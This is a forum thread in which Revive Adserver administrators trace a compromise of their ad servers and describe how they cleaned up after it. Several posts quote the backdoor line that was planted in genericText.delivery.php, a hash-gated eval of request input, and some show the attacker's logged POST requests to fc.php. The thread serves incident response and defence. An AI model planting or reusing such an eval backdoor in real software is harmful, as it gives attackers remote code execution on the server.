Jump to content
Snaggy

Mobile ads have been hijacked

Recommended Posts

Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
Thank you for your assistance!

I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation.
@Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

Share this post


Link to post
Share on other sites

My genericText.delivery file has this line...

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6f3ba4fbec5bfe3817fc319f3031fdaa'){@eval($_REQUEST['zoneId']);}
?>

I take it that this should be deleted?

Share this post


Link to post
Share on other sites
6 hours ago, Ian vM said:

@tvvpmi which version are you running ? did you upgrade from an older version in the past too ?

Last one 4.1.4

I have upgrade from prior version. But this instalation comes from an old instalation. 2.8 series

 

I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack

Share this post


Link to post
Share on other sites
3 hours ago, sunech said:

Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
Thank you for your assistance!

I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation.
@Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

Same here.

From stat genericText.delivery.php
 2018-12-22 08:51:50.724940460 +0100

Share this post


Link to post
Share on other sites
15 minutes ago, tvvpmi said:

Same here.

From stat genericText.delivery.php
 2018-12-22 08:51:50.724940460 +0100

Like in @snaggy case, this line has been added at the end of genericText.delivery.php

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

Share this post


Link to post
Share on other sites
16 hours ago, tvvpmi said:

I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack

I have more info. I just have received another attack just now. I have the POST parameters the attacker is using. Some of admin is interested in receiving them?

Share this post


Link to post
Share on other sites

We are having the exact problem and symptoms:

  • Injection in the zones table of the Revive database.
  • The file genericText.delivery.php has been compromised.
  • I found the following suspicious entries in the NGINX log-file:

176.31.187.82 - - [17/Dec/2018:10:07:33 +0100] "POST /adxmlrpc.php HTTP/1.1" 200 11329 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 0.210 x.x.x.x -
176.31.187.82 - - [17/Dec/2018:10:07:36 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 76 "https://google.com/serach?q=https://adsserver.xxx/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)" 0.439 x.x.x.x -

Running an upgraded Revive 4.1.3. Have been upgrading every version since 2011. ( when it was still called Open-X )

Share this post


Link to post
Share on other sites

Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

Problably it has been modified, adding a line like this at the end:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

You have to remove it. 

Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM

Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.

Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them

Share this post


Link to post
Share on other sites

Thank you @tvvpmi. That did the trick!

I've been searching through a database-dump of the database for traces of suspicious JavaScript or iframes, but they only tempered with one specific ad for some reason. There were no PHP-files in the images folder though..
Like you've suggested: I've removed the ability to execute PHP-files in the images-folder, and the installation haven't been compromised since.

Share this post


Link to post
Share on other sites

I had the same issue. The injection also changed my DB structure for the append column in the ox_zones  table. No other files were modified, but I do believe the code put in the file, did the other modification to put in the code that was added to the append column


I did also have another issue where an intruder logged into our system, the log said as me, and added code the mobile redirection directly to the ad creative.  I added a different admin user, and removed my old one... I also reinstalled revive-adserver. 

I haven't seen any traffic since then of people poking around my admin area. Just tonight someone tried to do the fc.php injection. I already have php execution disabled in my images folder. The difference now is the permissions on the plugins folder. They are unable to write to that file now.


 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now



×